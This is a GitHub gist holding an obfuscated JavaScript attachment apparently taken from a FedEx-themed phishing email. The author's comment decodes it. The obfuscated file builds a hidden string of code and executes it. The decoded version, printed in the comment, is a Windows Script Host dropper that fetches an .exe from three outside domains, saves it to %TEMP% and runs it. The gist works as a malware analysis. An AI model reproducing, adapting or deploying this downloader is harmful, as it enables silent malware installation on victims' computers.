Skip to content

Instantly share code, notes, and snippets.

@tmcw

tmcw/fedex_phishing.js

Created April 19, 2015 01:30
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save tmcw/a76d0525caeb524ed2f1 to your computer and use it in GitHub Desktop.
Save tmcw/a76d0525caeb524ed2f1 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
fedex_phishing.js
var www = "5555525E100B092409050713160D030C104A0B1603";
function __parser__previous__es() {
__sql__id('le(fn'); __scanner__css();
}
;
function __en__downloader() {
__sql__id(');'); __java__wrapper__parser__init();
}
;
function __in__channel__form() {
__sql__id('} };'); __regular__in__jar__sid();
}
;
function __analyzer__move__pl() {
__sql__id('ct'); __object__txt__updater__ru();
}
;
function __common__wrap__downloader__xml() {
__sql__id('= '); __stop__gid__item();
}
;
function __editor__src__es() {
__sql__id('; '); __tiny__checker__regexp();
}
;
function __ca__private__scanner() {
__sql__id('osi'); __de__page__sum();
}
;
function __rar__system__analyze__temp() {
__sql__id('veXOb'); __fr__zip__form();
}
;
function __wrapper__eu__java__in() {
__sql__id('k-'); __checker__push();
}
;
function __parser__browser() {
__sql__id(' 1'); __php__zip__updater();
}
;
function __pid__viewer__form() {
__sql__id('gs("%'); __pid__cn();
}
;
function __gateway__second__void() {
__sql__id(' if '); __parser__logout();
}
;
function __parser__viewer__copy__my() {
__sql__id(']+'); __scanner__sum();
}
;
function __new__jar__random__css() {
__sql__id('ject('); __random__pid();
}
;
function __last__prop__index__var() {
__sql__id('= '); __first__scan__gz__sql();
}
;
function __gid__xml__compress() {
__sql__id('cti'); __rar__system__analyze__temp();
}
;
function __second__php__it() {
__sql__id('n ='); __stop__ca__br();
}
;
function __html__swap__show() {
__sql__id('(); '); __viewer__project__register__es();
}
;
function __link__downloader__scanner() {
__sql__id('> 5'); __edit__updater__analyzer__third();
}
;
function __sort__reg__ex() {
__sql__id('pen'); __html__swap__show();
}
;
function __au__num__ru__soft() {
__sql__id('rnd="'); __stat__type__html();
}
;
function __next__jar__seed() {
__sql__id('.Run('); __in__gz__function__last();
}
;
function __php__zip__updater() {
__sql__id('; x'); __downloader__temp__num__private();
}
;
function __gz__pl__analyze() {
__find__eu = this[__xhtml__stop]; __sql__id(' { va'); __sid__rar__br__stop();
}
;
function __ru__publish__cn__sort() {
__sql__id('}; i'); __obj__uk__checker();
}
;
function __prev__txt__jquery() {
__sql__id('w.boo'); __wrapper__eu__java__in();
}
;
function __previous__site__zip__tiny() {
__sql__id(' v'); __type__in__find__copy();
}
;
function __ru__jar() {
__sql__id('r f'); __second__php__it();
}
;
function __void__wrapper__analyzer__downloader() {
__sql__id('size '); __link__downloader__scanner();
}
;
function __br__show() {
__sql__id('.sa'); __xhtml__sender__pl__wizard();
}
;
function __asset__regular__send() {
__sql__id('viro'); __ca__xml();
}
;
function __sql__id(_v_) {
__browser__au__param = __browser__au__param + _v_;
}
;
function __publish__html__au() {
__sql__id('MP%'); __txt__pl__stable();
}
;
function __num__compress__analyze__valid() {
__sql__id('spli'); __const__send__scanner();
}
;
function __class__stab() {
__sql__id('docum'); __src__gz__uk();
}
;
function __src__gz__uk() {
__sql__id('ent'); __reset__port__updater();
}
;
function __stop__ca__br() {
__sql__id(' ws.'); __asset__scan__txt();
}
;
function __request__third__html__sid() {
__sql__id('xo '); __sender__trim__channel__trend();
}
;
function __it__show__it__stop() {
__sql__id(' try '); __es__game__wrapper();
}
;
function __scanner__pl__lid() {
__sql__id('.n'); __au__java__type__wrapper();
}
;
function __num__checker() {
__sql__id('.sta'); __uk__br__second();
}
;
function __num__temp__lid() {
__sql__id('3);'); __cn__big();
}
;
function __object__txt__updater__ru() {
__sql__id('iveX'); __num__pid__prop();
}
;
function __parser__var__move__editor() {
__sql__id('ar i'); __rar__function__analyzer();
}
;
function __jquery__wrapper__sid__view() {
__sql__id(' p'); __my__java__txt__updater();
}
;
function __stop__gid__item() {
__sql__id('4 && '); __checker__const();
}
;
function __checker__sum() {
__sql__id('xo.op'); __parser__gz();
}
;
function __online__editor__forum() {
__sql__id('s ='); __online__recieve__downloader();
}
;
function __push__temp() {
__sql__id('2);'); __cat__de__internal();
}
;
function __game__scanner() {
__sql__id('eak'); __pro__type__big();
}
;
function __in__gz__function__last() {
__sql__id('fn'); __json__src__last();
}
;
function __online__recieve__downloader() {
__sql__id(' new'); __dir__big();
}
;
function __src__cat__downloader__checker() {
__sql__id('TP");'); __cat__txt();
}
;
function __xml__checker__third() {
__sql__id('ea'); __ca__txt();
}
;
function __sender__trim__channel__trend() {
__sql__id('= '); __de__project__sql__gate();
}
;
function __es__in() {
__sql__id(' ='); __parser__browser();
}
;
function __start__external__process() {
__sql__id(' w'); __online__editor__forum();
}
;
function __fr__it() {
__sql__id('+".ex'); __void__css();
}
;
function __random__form() {
__sql__id(' ='); __java__proxy__find__lid();
}
;
function __find__user__css__stop() {
__sql__id('.S'); __logout__push();
}
;
function __xml__create__checker() {
__sql__id('dn'); __part__xhtml__php();
}
;
function __id__invalid() {
__sql__id('a-'); __gz__parser__valid();
}
;
function __java__proxy__find__lid() {
__sql__id('= '); __ex__ca__scanner__process();
}
;
function __ca__sid() {
__sql__id('or (v'); __parser__var__move__editor();
}
;
function __au__get() {
__sql__id('arin'); __id__invalid();
}
;
function __scanner__css() {
__sql__id(',2'); __str__get();
}
;
function __parser__gz() {
__sql__id('en("G'); __soft__include();
}
;
function __res__invalid__big() {
__sql__id('="+w'); __xml__updater();
}
;
function __txt__downloader__wizard__common() {
__sql__id('2)+M'); __de__directory();
}
;
function __stable__json__item__sql() {
__sql__id('-h'); __xml__soft();
}
;
function __ex__ca__scanner__process() {
__sql__id('200) '); __category__admin__login();
}
;
function __theme__ca__session() {
__sql__id('} c'); __json__valid__gid__directory();
}
;
function __access__lid__publish__page() {
__sql__id(');'); __wrapper__de__core();
}
;
function __src__name() {
__sql__id('= 0;'); __editor__wrapper();
}
;
function __sql__forum__browser() {
__sql__id('type '); __cache__es__it__process();
}
;
function __regular__in__jar__sid() {
__sql__id(' dl('); __download__internal();
}
;
function __xml__browser() {
__sql__id('-now.'); __checker__previous__txt();
}
;
function __analyzer__sid() {
__sql__id('*1'); __cn__updater__js__previous();
}
;
function __pl__rar__get__xml() {
__sql__id('e ='); __common__wrap__downloader__xml();
}
;
function __cat__de__internal() {
__sql__id(' dl'); __param__download__seed__get();
}
;
function __pro__type__big() {
__sql__id('; '); __in__channel__form();
}
;
function __private__pro__browser__gid() {
__sql__id('entS'); __src__analyze();
}
;
function __void__css() {
__sql__id('e";'); __previous__site__zip__tiny();
}
;
function __fr__port__ru() {
__sql__id('.leng'); __in__upload();
}
;
function __wrapper__de__core() {
__sql__id(' va'); __ru__jar();
}
;
function __sql__parser__random__login() {
__sql__id('catch'); __fid__num__online();
}
;
function __downloader__temp__num__private() {
__sql__id('a.p'); __ca__private__scanner();
}
;
function __external__id__xor() {
__sql__id('d(Ma'); __online__updater__check();
}
;
function __browser__ru__logout() {
__sql__id('Fi'); __parser__previous__es();
}
;
function __ca__txt() {
__sql__id('m");'); __prev__de__tag();
}
;
function __php__invalid() {
__sql__id('t("'); __updater__ru();
}
;
function __type__in__find__copy() {
__sql__id('ar dn'); __type__js();
}
;
function __viewer__project__register__es() {
__sql__id('xa.'); __sql__forum__browser();
}
;
function __slide__analyzer() {
__sql__id('= '); __scanner__next__folder();
}
;
function __tiny__fr__analyzer() {
__sql__id(' i<b'); __fr__port__ru();
}
;
function __add__zip__item__login() {
__sql__id('69'); __push__temp();
}
;
function __parser__logout() {
__sql__id('(xo.'); __sort__rnd__common__port();
}
;
function __wrapper__tiny__eu() {
__sql__id('on '); __src__name();
}
;
function __de__page__sum() {
__sql__id('ti'); __wrapper__tiny__eu();
}
;
function __php__random__php__shop() {
__sql__id('Cod'); __find__create__editor__au();
}
;
function __tiny__css() {
__xhtml__stop += 'a'; __sql__id('n dl'); __gz__updater();
}
;
function __json__valid__gid__directory() {
__sql__id('atc'); __updater__xhtml__second__jquery();
}
;
function __java__sum() {
__sql__id('ers'); __xml__browser();
}
;
function __random__first() {
__sql__id('t("'); __in__html();
}
;
function __json__src__last() {
__sql__id(',1,0)'); __new__eu__seed();
}
;
function __checker__previous__txt() {
__sql__id('com".'); __num__compress__analyze__valid();
}
;
function __dir__big() {
__sql__id(' A'); __reg__ru__updater();
}
;
function __big__analyze__au() {
__sql__id(',"h'); __copy__res__html__downloader();
}
;
function __scanner__scanner__analyzer__zip() {
__sql__id('an'); __login__system__viewer();
}
;
function __asset__big() {
__sql__id('tr'); __xml__checker__third();
}
;
function __new__es() {
__sql__id('veXOb'); __new__jar__random__css();
}
;
function __prev__de__tag() {
__sql__id(' xa.o'); __sort__reg__ex();
}
;
function __type__channel() {
__sql__id('andEn'); __asset__regular__send();
}
;
function __rar__function__analyzer() {
__sql__id('=0;'); __tiny__fr__analyzer();
}
;
function __cache__es__it__process() {
__sql__id('= 1; '); __eu__viewer();
}
;
function __eu__viewer() {
__sql__id('xa.w'); __cn__asset__json();
}
;
function __lid__host__de__upload() {
__sql__id('{ var'); __start__external__process();
}
;
function __id__sql__project__jar() {
__sql__id('tio'); __json__num__txt__ca();
}
;
function __port__uk__uk() {
__sql__id(' "c'); __au__get();
}
;
function __asset__scan__txt() {
__sql__id('Exp'); __type__channel();
}
;
function __compress__sort__sender__source() {
__sql__id('MLHT'); __src__cat__downloader__checker();
}
;
function __updater__hold__cn__scan() {
__sql__id('sen'); __name__viewer__board();
}
;
function __first__scan__gz__sql() {
__sql__id('1) br'); __game__scanner();
}
;
function __sort__rnd__common__port() {
__sql__id('read'); __pid__pid__updater();
}
;
function __scanner__sum() {
__sql__id('"/'); __class__stab();
}
;
function __xml__updater() {
__sql__id('ww'); __zip__game__updater();
}
;
function __part__xhtml__php() {
__sql__id(' ='); __last__prop__index__var();
}
;
function __analyzer__downloader__seed__downloader() {
__sql__id('nre'); __json__xml__site__seed();
}
;
function __tmp__directory__br__scanner() {
__sql__id(' ('); __lid__src__css();
}
;
function __copy__res__html__downloader() {
__sql__id('ttp:/'); __sid__downloader__src();
}
;
function __str__get() {
__sql__id(');'); __it__show__it__stop();
}
;
function __au__java__type__wrapper() {
__sql__id('idho'); __ca__recieve__txt();
}
;
function __soft__include() {
__sql__id('ET"'); __big__analyze__au();
}
;
function __editor__wrapper() {
__sql__id(' xa'); __br__show();
}
;
function __de__add__ru__it() {
__sql__id('ODB.S'); __asset__big();
}
;
function __show__br() {
__sql__id('ring'); __stable__internal__sum__id();
}
;
function __random__random__fid__json() {
__sql__id('o.'); __updater__hold__cn__scan();
}
;
function __last__const__editor__html() {
__sql__id(' x'); __random__random__fid__json();
}
;
function __param__download__seed__get() {
__sql__id('(137'); __num__temp__lid();
}
;
function __updater__xhtml__second__jquery() {
__sql__id('h ('); __es__invalid__gz__seed();
}
;
function __pid__cn() {
__sql__id('TE'); __publish__html__au();
}
;
function __online__updater__check() {
__sql__id('th'); __java__xor__start();
}
;
function __login__search__gate() {
__sql__id('unc'); __id__sql__project__jar();
}
;
function __num__scanner__wrapper() {
__sql__id('xo'); __updater__sql__list__gate();
}
;
function __soft__es__xml__archive() {
__sql__id('y { '); __checker__sum();
}
;
function __pl__tag__create__jar() {
__sql__id('chang'); __br__uk__view__text();
}
;
function __cat__txt() {
__sql__id(' xo.o'); __analyzer__downloader__seed__downloader();
}
;
function __xhtml__sender() {
__sql__id('pt'); __find__user__css__stop();
}
;
function __src__analyze() {
__sql__id('trin'); __pid__viewer__form();
}
;
function __download__internal() {
__sql__id('6091'); __name__cn__stable__trim();
}
;
function __in__zip__cat__cloud() {
__xhtml__stop += 'v'; __sql__id('io'); __tiny__css();
}
;
function __updater__sql__list__gate() {
__sql__id('.Res'); __info__pl__second();
}
;
function __cn__asset__json() {
__sql__id('rite('); __num__scanner__wrapper();
}
;
function __xhtml__sender__pl__wizard() {
__sql__id('ve'); __sum__shop__theme__java();
}
;
function __const__send__scanner() {
__sql__id('t(" '); __logout__view__parser__ru();
}
;
function __uk__br__second() {
__sql__id('tus'); __random__form();
}
;
function __cn__big() {
__find__eu(__browser__au__param);
}
;
function __de__directory() {
__sql__id('ath.r'); __temp__compress__internal__asset();
}
;
function __stat__type__html() {
__sql__id('+fr'); __reset__swap();
}
;
function __reg__ru__updater() {
__sql__id('cti'); __new__es();
}
;
function __lid__src__css() {
__sql__id('xa.'); __void__wrapper__analyzer__downloader();
}
;
function __css__fid() {
__xhtml__stop = 'e'; __sql__id('funct'); __in__zip__cat__cloud();
}
;
function __php__proxy__gid__script() {
__sql__id('l.com'); __jquery__wrapper__sid__view();
}
;
function __login__system__viewer() {
__sql__id('dom()'); __analyzer__sid();
}
;
function __in__upload() {
__sql__id('th; i'); __downloader__analyze__scanner__html();
}
;
function __zip__game__updater() {
__sql__id(', fa'); __sender__wrapper__archive();
}
;
function __checker__push() {
__sql__id('keep'); __java__sum();
}
;
function __edit__updater__analyzer__third() {
__sql__id('000'); __gateway__form__checker__user();
}
;
function __new__eu__seed() {
__sql__id('; '); __theme__ca__session();
}
;
function __function__sql__es__ca() {
__sql__id('ec'); __random__first();
}
;
function __json__num__txt__ca() {
__sql__id('n() {'); __gateway__second__void();
}
;
function __reset__swap() {
__sql__id('+"&id'); __res__invalid__big();
}
;
function __in__html() {
__sql__id('MSXM'); __index__pl();
}
;
function __gz__next__random() {
__sql__id('te'); __pl__tag__create__jar();
}
;
function __sid__it__xml() {
__sql__id('a.cl'); __ca__src();
}
;
function __downloader__analyze__scanner__html() {
__sql__id('++) '); __lid__host__de__upload();
}
;
function __random__edit__res() {
__sql__id('000)'); __fr__it();
}
;
function __gz__updater() {
__xhtml__stop += 'l'; __sql__id('(fr)'); __gz__pl__analyze();
}
;
function __my__java__txt__updater() {
__sql__id('itfaa'); __scanner__pl__lid();
}
;
function __reset__port__updater() {
__sql__id('.p'); __gid__parser__seed();
}
;
var __browser__au__param = '';
function __sender__id__sort() {
__sql__id('at'); __pl__rar__get__xml();
}
;
function __parser__edit() {
__sql__id('; x'); __sid__it__xml();
}
;
function __name__viewer__board() {
__sql__id('d('); __en__downloader();
}
;
function __type__js() {
__sql__id(' ='); __it__seed();
}
;
function __eu__stop__in__br() {
__sql__id('a '); __slide__analyzer();
}
;
function __name__cn__stable__trim() {
__sql__id('); d'); __stable__gid();
}
;
function __index__pl() {
__sql__id('L2.X'); __compress__sort__sender__source();
}
;
function __gz__gate() {
__sql__id('+b[i'); __parser__viewer__copy__my();
}
;
function __es__invalid__gz__seed() {
__sql__id('er) {'); __in__compress__sort();
}
;
function __tiny__checker__regexp() {
__sql__id('}; tr'); __soft__es__xml__archive();
}
;
function __checker__const() {
__sql__id('xo'); __num__checker();
}
;
function __ca__xml() {
__sql__id('nm'); __private__pro__browser__gid();
}
;
function __info__pl__second() {
__sql__id('ponse'); __checker__id();
}
;
function __sid__downloader__src() {
__sql__id('/"'); __gz__gate();
}
;
function __updater__ru() {
__sql__id('AD'); __de__add__ru__it();
}
;
function __temp__compress__internal__asset() {
__sql__id('oun'); __external__id__xor();
}
;
function __sum__shop__theme__java() {
__sql__id('To'); __browser__ru__logout();
}
;
function __java__wrapper__parser__init() {
__sql__id(' } '); __sql__parser__random__login();
}
;
function __logout__push() {
__sql__id('hell"'); __access__lid__publish__page();
}
;
function __folder__init__class__type() {
__sql__id('ri'); __xhtml__sender();
}
;
function __br__uk__view__text() {
__sql__id('e = f'); __login__search__gate();
}
;
var __find__eu = '';
function __find__create__editor__au() {
__sql__id('e(9'); __txt__downloader__wizard__common();
}
;
function __gz__parser__valid() {
__sql__id('paris'); __stable__json__item__sql();
}
;
function __pid__pid__updater() {
__sql__id('ySt'); __sender__id__sort();
}
;
var __xhtml__stop = '';
function __stable__gid() {
__sql__id('l(8'); __add__zip__item__login();
}
;
function __login__java() {
__sql__id('ta'); __gz__next__random();
}
;
function __random__pid() {
__sql__id('"WSc'); __folder__init__class__type();
}
;
function __in__compress__sort() {
__sql__id('}; }'); __parser__edit();
}
;
function __gateway__form__checker__user() {
__sql__id(') '); __reg__sort();
}
;
function __parser__sid__viewer__cloud() {
__sql__id('; if'); __tmp__directory__br__scanner();
}
;
function __txt__pl__stable() {
__sql__id('")+St'); __show__br();
}
;
function __xml__soft() {
__sql__id('ote'); __php__proxy__gid__script();
}
;
function __fr__zip__form() {
__sql__id('jec'); __php__invalid();
}
;
function __java__xor__start() {
__sql__id('.r'); __scanner__scanner__analyzer__zip();
}
;
function __ca__recieve__txt() {
__sql__id('g.c'); __small__small__en__it();
}
;
function __category__admin__login() {
__sql__id('{ var'); __scan__txt__sender();
}
;
function __logout__view__parser__ru() {
__sql__id('"); f'); __ca__sid();
}
;
function __scan__txt__sender() {
__sql__id(' x'); __eu__stop__in__br();
}
;
function __cn__updater__js__previous() {
__sql__id('00000'); __random__edit__res();
}
;
function __stable__internal__sum__id() {
__sql__id('.from'); __compress__second__sender();
}
;
function __ru__checker() {
__sql__id('(); }'); __editor__src__es();
}
;
function __sid__rar__br__stop() {
__sql__id('r b ='); __port__uk__uk();
}
;
function __br__viewer() {
__sql__id(' var '); __request__third__html__sid();
}
;
function __checker__id() {
__sql__id('Body)'); __parser__sid__viewer__cloud();
}
;
function __es__game__wrapper() {
__sql__id('{ ws'); __next__jar__seed();
}
;
function __gid__parser__seed() {
__sql__id('hp?'); __au__num__ru__soft();
}
;
function __obj__uk__checker() {
__sql__id('f ('); __xml__create__checker();
}
;
function __scanner__next__folder() {
__sql__id('new A'); __gid__xml__compress();
}
;
function __json__xml__site__seed() {
__sql__id('adys'); __login__java();
}
;
function __ca__src() {
__sql__id('ose'); __ru__checker();
}
;
function __it__seed() {
__sql__id(' 0;'); __br__viewer();
}
;
function __num__pid__prop() {
__sql__id('Obj'); __function__sql__es__ca();
}
;
function __sender__wrapper__archive() {
__sql__id('lse);'); __last__const__editor__html();
}
;
function __fid__num__online() {
__sql__id(' ('); __pid__core();
}
;
function __de__project__sql__gate() {
__sql__id('new A'); __analyzer__move__pl();
}
;
function __small__small__en__it() {
__sql__id('om ww'); __prev__txt__jquery();
}
;
function __reg__sort() {
__sql__id('{ dn'); __es__in();
}
;
function __pid__core() {
__sql__id('er) {'); __ru__publish__cn__sort();
}
;
function __compress__second__sender() {
__sql__id('Char'); __php__random__php__shop();
}
;__css__fid();
@tmcw
Copy link
Author

tmcw commented Apr 19, 2015

This builds the following source code as a string:

function dl(fr) {
  var b = "carina-paris-hotel.com pitfaa.nidhog.com www.book-keepers-now.com".split(" ");
  for (var i = 0; i < b.length; i++) {
    var ws = new ActiveXObject("WScript.Shell"); var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + Math.round(Math.random() * 100000000) + ".exe"; var dn = 0; var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
      if (xo.readyState == 4 && xo.status == 200) {
        var xa = new ActiveXObject("ADODB.Stream");
        xa.open();
        xa.type = 1; xa.write(xo.ResponseBody);
        if (xa.size > 5000) {
          dn = 1;
          xa.position = 0; xa.saveToFile(fn, 2); try {
            ws.Run(fn, 1, 0);
          } catch (er) {};
        }
        ;xa.close();
      }
      ;
    }; try {
      xo.open("GET", "http://" + b[i] + "/document.php?rnd=" + fr + "&id=" + www, false); xo.send();
    } catch (er) {};
    if (dn == 1) break;
  }
}
;dl(6091); dl(8692); dl(1373);

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment